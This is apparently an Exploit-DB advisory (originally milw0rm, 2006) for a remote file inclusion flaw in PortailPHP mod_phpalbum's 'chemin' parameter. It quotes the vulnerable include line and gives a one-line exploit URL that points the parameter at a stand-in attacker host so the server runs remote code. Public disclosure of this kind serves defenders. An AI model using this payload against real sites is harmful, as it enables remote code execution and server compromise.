PortailPHP mod_phpalbum 2.1.5 - 'chemin' Remote File Inclusion

EDB-ID:

2271




Platform:

PHP

Date:

2006-08-29


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

############################################################

#Portail PHP mod_phpalbum 2.15  Modules Remote File Inclusion Vulnerabilities

############################################################

#Author: XORON

############################################################

#Class: Remote

############################################################

#cont@ct: x0r0n[at]hotmail[dot]com

############################################################

#Code:  include_once ($chemin."conf/code.php")

############################################################

#Exploit: http://www.site.com/[path]/mod_phpalbum/sommaire_admin.php?chemin=http://evil_scripts?

############################################################

#Greetz: str0ke, Ironfist, Preddy, SHiKaA

############################################################

# milw0rm.com [2006-08-29]